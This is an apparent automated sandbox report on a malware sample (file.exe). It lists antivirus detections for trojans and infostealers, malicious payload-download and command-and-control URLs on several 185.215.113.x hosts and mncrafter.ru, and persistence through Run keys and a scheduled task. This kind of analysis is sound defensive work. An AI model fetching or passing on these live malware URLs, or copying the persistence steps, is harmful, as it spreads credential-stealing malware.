C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe	37%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe	37%	ReversingLabs	Win32.Infostealer.Tinba

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mncrafter.ru	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://185.215.113.16/c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb4uX	100%	Avira URL Cloud	phishing
http://mncrafter.ru/test2.exev=	100%	Avira URL Cloud	malware
http://mncrafter.ru/test2.exe#=	100%	Avira URL Cloud	malware
http://185.215.113.16/off/random.exe4c613	100%	Avira URL Cloud	phishing
http://185.215.113.206/68b591d6548ec281/freebl3.dllM	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpation	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php$	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php9z	100%	Avira URL Cloud	malware
http://mncrafter.ru/test2.exe#=	12%	Virustotal		Browse
http://185.215.113.206/68b591d6548ec281/nss3.dlli	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpiF	100%	Avira URL Cloud	malware
http://185.215.113.16/luma/random.exe1	100%	Avira URL Cloud	phishing
http://185.215.113.206/c4becf79229cb002.phpH	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/nss3.dllQ	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exe613a	100%	Avira URL Cloud	phishing
http://185.215.113.16/off/random.exeI	100%	Avira URL Cloud	phishing
http://185.215.113.206/c4becf79229cb002.php2g	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exe1395d7	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe61395dC	100%	Avira URL Cloud	phishing
http://185.215.113.16/mine/random.exeK	100%	Avira URL Cloud	phishing
http://185.215.113.16/off/random.exec61395dE	100%	Avira URL Cloud	phishing
http://185.215.113.43/Zu7JuNko/index.phpI	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exes	100%	Avira URL Cloud	phishing
http://185.215.113.206/68b591d6548ec281/vcruntime140.dllA	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/softokn3.dllM	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exe15001	100%	Avira URL Cloud	phishing
http://185.215.113.206/68b591d6548ec281/sqlite3.dll_	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpMy	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpSession	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exe)	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
plus.l.google.com	172.217.18.14	true	false		high
play.google.com	142.250.186.110	true	false		high
www.google.com	172.217.16.196	true	false		high
mncrafter.ru	87.236.16.19	true	false	10%, Virustotal, Browse	unknown
apis.google.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false	high
http://185.215.113.206/	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false	high
https://navygenerayk.store/api	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
185.215.113.206/c4becf79229cb002.php	false	high
https://play.google.com/log?format=json&hasfast=true	false	high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high
http://185.215.113.16/mine/random.exe	false	high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false	high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	false	high
http://185.215.113.206/68b591d6548ec281/msvcp140.dll	false	high
http://185.215.113.16/steam/random.exe	false	high
http://185.215.113.206/c4becf79229cb002.php	false	high
https://www.google.com/async/newtab_promos	false	high
https://www.google.com/async/ddljson?async=ntp:2	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/freebl3.dllM	file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb4uX	skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://mncrafter.ru/test2.exev=	skotes.exe, 0000000C.00000002.2950396161.000000000144D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000002.00000003.1761107695.00000216544A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761107695.0000021654507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761107695.00000216544F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761107695.00000216544C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761107695.00000216544E8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mncrafter.ru/test2.exe#=	skotes.exe, 0000000C.00000002.2950396161.000000000144D000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpnu	skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2C:	svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe4c613	skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206Local	file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000002.00000003.1761107695.0000021654456000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpation	file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/Local	skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2032674785.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod	svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php$	file.exe, 00000000.00000002.2028498077.0000000023A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.php9z	file.exe, 00000000.00000002.2028498077.00000000239FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/68b591d6548ec281/nss3.dlli	file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000002.00000002.2530392131.000002165420F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpiF	skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, 00000000.00000003.1839776268.000000001D8BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.1908958326.0000000023C21000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdC:	svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpH	file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://185.215.113.16/luma/random.exe1	skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/68b591d6548ec281/nss3.dllQ	file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/steam/random.exe613a	skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/off/random.exeI	skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/c4becf79229cb002.php2g	file.exe, 00000000.00000002.2028498077.0000000023A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/steam/random.exe1395d7	skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	file.exe, 00000000.00000003.1908958326.0000000023C21000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe61395dC	skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/mine/random.exeK	file.exe, 00000000.00000002.1998156221.0000000001637000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.43/Zu7JuNko/index.phpI	skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpG	skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1839776268.000000001D8BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	false		high
http://185.215.113.16/off/random.exec61395dE	skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/luma/random.exe	skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exes	skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/68b591d6548ec281/vcruntime140.dllA	file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000035.00000002.2939843685.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533303286.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000035.00000002.2939843685.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533303286.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	false		high
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032225915.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/softokn3.dllM	file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/steam/random.exe15001	skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.43/Local	skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq	svchost.exe, 0000003E.00000003.2800434031.000001D5599A5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll_	file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpMy	file.exe, 00000000.00000002.2028498077.00000000239FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpSession	file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/e	file.exe, 00000000.00000002.1998156221.0000000001637000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/	skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phps	skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000002.00000003.1761107695.00000216544C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php~	skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe)	skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.18.14	plus.l.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
87.236.16.19	mncrafter.ru	Russian Federation	198610	BEGET-ASRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.186.110	play.google.com	United States	15169	GOOGLEUS	false
172.217.16.196	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1553357
Start date and time:	2024-11-11 01:13:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	12
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@89/119@7/10
EGA Information:	Successful, ratio: 80%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 216.58.212.131, 142.250.185.174, 74.125.71.84, 142.250.185.227, 34.104.35.123, 142.250.185.170, 172.217.16.138, 142.250.186.170, 142.250.186.138, 142.250.186.74, 142.250.185.202, 142.250.184.202, 142.250.181.234, 142.250.74.202, 216.58.212.138, 172.217.23.106, 142.250.185.74, 142.250.185.234, 172.217.18.10, 142.250.186.42, 142.250.185.138, 184.28.90.27, 199.232.214.172, 192.229.221.95, 20.190.160.17, 40.126.32.74, 40.126.32.72, 40.126.32.133, 20.190.160.14, 40.126.32.76, 40.126.32.134, 40.126.32.138
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, presticitpo.store, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, necklacedmny.store, www.gstatic.com, prod.fs.microsoft.com.akadns.net, fadehairucw.store, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, ogads-pa.googleapis.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, navygenerayk.store, founpiuer.store, edgedl.me.gvt1.com, thumbystriw.store, clients.l.google.com, crisiwarny.store, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target file.exe, PID 7312 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:14:27	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
00:15:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 96b31e1a32.exe C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe
00:15:49	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 96b31e1a32.exe C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe
00:15:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 8490cd1d50.exe C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe
00:16:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c511421282.exe C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe
19:14:04	API Interceptor	23x Sleep call for process: svchost.exe modified
19:15:02	API Interceptor	884x Sleep call for process: skotes.exe modified
19:15:17	API Interceptor	19x Sleep call for process: powershell.exe modified
19:15:53	API Interceptor	9x Sleep call for process: winlogon.exe modified
19:15:54	API Interceptor	8x Sleep call for process: lsass.exe modified
19:15:56	API Interceptor	34x Sleep call for process: dialer.exe modified
19:15:57	API Interceptor	5x Sleep call for process: dwm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
185.215.113.16	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16/steam/random.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mncrafter.ru	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	87.236.16.19

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
